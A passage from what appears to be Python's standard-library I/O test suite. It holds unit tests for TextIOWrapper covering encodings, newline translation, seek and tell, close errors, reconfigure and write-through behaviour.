t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different than the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(support.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(support.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
